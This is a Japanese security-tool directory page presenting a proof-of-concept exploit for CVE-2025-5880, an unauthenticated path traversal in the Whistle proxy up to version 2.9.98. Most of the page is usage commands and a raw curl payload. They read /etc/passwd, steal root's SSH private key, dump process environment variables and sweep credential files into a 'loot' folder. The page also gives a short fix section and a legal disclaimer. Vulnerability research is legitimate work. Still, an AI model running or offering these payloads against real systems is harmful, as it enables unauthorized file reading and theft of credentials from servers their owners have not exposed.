Skip to content
KitploitKITPLOIT
ツールブログ
提出
ツールブログ
提出

ハッキング、侵入テスト、サイバーセキュリティツールをあなたのセキュリティアーセナルに!

Kitploitはハッキング、サイバーセキュリティ、ペネトレーションテストのツールディレクトリです。最新のプロジェクトアップデートを見つけて、脆弱性の発見、システム分析、テストの自動化、セキュリティの強化を行いましょう。

··フィード·お問い合わせ·プライバシー·© 2026 Kitploit

ツールディレクトリ

カテゴリ

すべてのカテゴリを見る
Loading categories
ツール/GitHubGitHub/yacine-rm/cve-2025-5880-poc
脆弱性分析エクスプロイトウェブアプリケーション悪用情報収集ペネトレーションテスト学習と教育
GitHubyacine-rm/cve-2025-5880-poc

CVE-2025-5880-PoC

Whistle v2.9.98における認証されていないパストラバーサルの脆弱性の概念実証エクスプロイト。

リポジトリを見る
13ヶ月前未レビュー

人気

すべて見る →

コミュニティで最も使われているツールを見つけましょう。

すべてのツールを探索

ツールコレクションを閲覧

すべてのツールを見る →
共有

CVE-2025-5880 — Whistle 2.9.98 パストラバーサル PoC

Python CVE CWE License

Whistle v2.9.98 における未認証のパストラバーサル脆弱性の実証コード。


脆弱性の概要

フィールド詳細
CVE IDCVE-2025-5880
CWECWE-22 (パストラバーサル)
影響を受けるソフトウェアWhistle ≤ 2.9.98
影響を受けるエンドポイント/cgi-bin/sessions/get-temp-file
攻撃ベクトルネットワーク — 認証不要
影響ホストファイルシステム上の任意のファイル読み取り

filename クエリパラメータはサニタイズされずにディスク上のファイルを開くために使用されるため、攻撃者は意図された一時ファイルディレクトリから脱出し、Whistle プロセスがアクセス権限を持つ任意のファイル(例: /etc/passwd, /root/.ssh/id_rsa)を読み取ることができます。


クイックスタート

root@kitploit:~
# Clone
git clone https://github.com/YourHandle/CVE-2025-5880
cd CVE-2025-5880
 
# No external dependencies
python3 CVE-2025-5880.py -u http://TARGET:8899 --preset passwd

使用法

root@kitploit:~
python3 CVE-2025-5880.py [-h] -u URL [-f FILE] [--preset PRESET]
                          [--sweep] [-o OUTPUT] [--save-dir DIR]
                          [--timeout N]

例

root@kitploit:~
# Read /etc/passwd
python3 CVE-2025-5880.py -u http://192.168.1.10:8899 --preset passwd
 
# Grab root's SSH private key
python3 CVE-2025-5880.py -u http://192.168.1.10:8899 --preset id_rsa -o id_rsa.pem
 
# Read an arbitrary path
python3 CVE-2025-5880.py -u http://192.168.1.10:8899 -f /proc/self/environ
 
# Sweep & save all presets
python3 CVE-2025-5880.py -u http://192.168.1.10:8899 --sweep --save-dir ./loot

生のPoC (curl)

root@kitploit:~
# /etc/passwd
curl -s "http://TARGET:8899/cgi-bin/sessions/get-temp-file?filename=/etc/passwd" | jq -r '.value'

修正方法

Whistle を、filename パラメータを検証して意図された一時ファイルディレクトリに制限するバージョンに更新してください。サーバー側で許可リストによるパス正規化(例: path.resolve + プレフィックスチェック)を適用してください。


免責事項

このツールは承認されたセキュリティテストおよび教育目的のみで提供されます。
所有していない、または明示的なテスト許可がないシステムに対する不正使用は違法かつ非倫理的です。
著者は誤用に対する一切の責任を負いません。

ツールをダウンロード
フラグ説明
-u / --urlターゲットのベースURL(例: http://192.168.1.10:8899)
-f / --file読み取る任意のファイルパス
--preset名前付きショートカット: passwd shadow hosts id_rsa …
--sweepすべてのプリセットを自動的に反復処理
-o / --output結果をファイルに保存
--save-dir--sweep による取得物を保存するディレクトリ
--timeoutHTTPタイムアウト(秒、デフォルト 10)